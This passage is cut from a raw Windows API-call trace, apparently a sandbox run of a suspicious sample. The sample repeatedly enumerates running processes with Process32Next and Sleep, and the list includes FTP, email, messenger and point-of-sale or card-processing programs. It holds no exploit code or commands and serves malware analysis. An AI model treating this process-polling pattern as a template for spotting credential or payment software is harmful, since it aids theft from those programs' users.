hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0241.144] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0241.146] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.147] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0241.148] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0241.150] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0241.151] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0241.153] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0241.157] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0241.158] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0241.160] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0241.161] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0241.163] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0241.164] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0241.166] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0241.167] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0241.171] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0241.173] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0241.174] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0241.176] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0241.177] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0241.179] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0241.180] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0241.181] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0241.183] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0241.206] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0241.208] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0241.210] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0241.212] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0241.214] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0241.216] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0241.221] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0241.223] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0241.226] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0241.228] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0241.235] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0241.237] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0241.239] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0241.241] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0241.243] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0241.245] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0241.299] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0241.301] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0241.303] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0241.305] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0241.307] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0241.309] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0241.314] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0241.316] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0241.318] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0241.319] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0241.322] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0241.326] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0241.328] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0241.330] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0241.332] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0241.333] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0241.336] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0241.338] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0241.340] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0241.376] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0241.378] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0241.380] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0241.382] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0241.384] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0241.385] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0241.390] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0241.392] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0241.393] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0241.395] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0241.396] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0241.398] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0241.400] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0241.401] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0241.475] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0241.477] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0241.479] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0241.504] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0241.506] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0241.508] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd24, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0241.510] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0241.516] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0241.518] CloseHandle (hObject=0x17b0) returned 1 [0241.518] Sleep (dwMilliseconds=0x64) [0241.622] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1494 [0241.635] Process32First (in: hSnapshot=0x1494, 